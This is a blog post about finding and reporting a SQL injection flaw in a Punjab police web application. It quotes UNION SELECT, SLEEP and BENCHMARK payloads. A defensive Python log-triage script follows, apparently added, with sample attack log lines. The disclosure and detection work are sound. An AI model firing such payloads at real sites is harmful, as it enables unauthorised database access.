How I Hacked Database of MOGA Police Services Punjab Web-Application !!
Hello Wonderful Readers,
I am Parshwa Bhavsar, back with another blog where I have taken over the whole database of MOGA Police Services Punjab’s web application ethically, reported it, and got an acknowledgement for it.
As I mentioned in my previous blog, I was finding vulnerabilities in Govt. websites to make sure the security level of Indian cyberspace is high.
After rolling through some websites, I came to know about one website which is the official website of MOGA Police Services. I extracted all the parameters for testing XSS and SQL injection vulnerabilities.
I found an interesting parameter: /mart_det.php?id=2
I tried the basic payload "%27" to check whether it was vulnerable or not.
It was vulnerable :)
I tried the following payloads:
UNION SELECT @@VERSION,SLEEP(5),3UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A'))--UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
After some other payloads and fuzzing, I was able to retrieve database names.
Obviously I cannot reveal them due to security reasons.
I immediately reported it to the Govt. of India and it was triggered after a day.
It is patched now and the previous data has been changed in a safe manner.
Here is one screenshot from that database for proof.
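For defenders, the probes described above (the %27 quote test, then UNION SELECT, SLEEP and BENCHMARK payloads against a numeric id parameter) leave recognisable traces in web server logs. The following is an added example, not code from the author or from the affected site: a Python triage that flags such requests, assuming a common access-log layout and using constructed sample lines.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Markers taken from the payloads quoted in the post; matched case-insensitively.
MARKERS = {
    "quote": re.compile(r"'"),
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "time_delay": re.compile(r"\b(sleep|benchmark)\s*\(", re.I),
    "fingerprint": re.compile(r"@@version|\buser\s*\(", re.I),
}
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def triage(line, param="id"):
    """Return sorted findings for one access-log line, or [] if the parameter is clean."""
    m = REQUEST.search(line)
    if not m:
        return []
    # parse_qs percent-decodes values and turns '+' into spaces before we match.
    query = urlsplit(m.group(1)).query
    values = parse_qs(query, keep_blank_values=True).get(param, [])
    findings = set()
    for value in values:
        if re.fullmatch(r"\d+", value):
            continue  # what a numeric record id should look like
        findings.add("non_numeric")
        findings.update(name for name, rx in MARKERS.items() if rx.search(value))
    return sorted(findings)

def report(lines):
    """Return (line index, findings) for every line that needs a closer look."""
    hits = []
    for index, line in enumerate(lines):
        found = triage(line)
        if found:
            hits.append((index, found))
    return hits

# Constructed sample log lines (documentation IP range, not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2021:10:00:00 +0000] "GET /mart_det.php?id=2 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [01/Jan/2021:10:00:05 +0000] "GET /mart_det.php?id=2%27 HTTP/1.1" 500 312',
    '203.0.113.7 - - [01/Jan/2021:10:00:09 +0000] "GET /mart_det.php?id=2+UNION+SELECT+@@VERSION,SLEEP(5),3 HTTP/1.1" 200 498',
    '203.0.113.7 - - [01/Jan/2021:10:00:20 +0000] "GET /mart_det.php?id=2%20uNiOn%20aLl%20SeLeCt%20BENCHMARK(1000000,MD5(%27A%27))-- HTTP/1.1" 200 498',
]

if __name__ == "__main__":
    for index, found in report(SAMPLE_LOG):
        print(index, found)
```

The "non_numeric" finding is the most robust signal, because it fires on any value that is not a plain integer regardless of how the payload is spelled; the same integer check belongs in the handler itself, together with a parameterized query.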
Here is the acknowledgement from Govt. of India.
I hope you liked it :)
Love Love !!!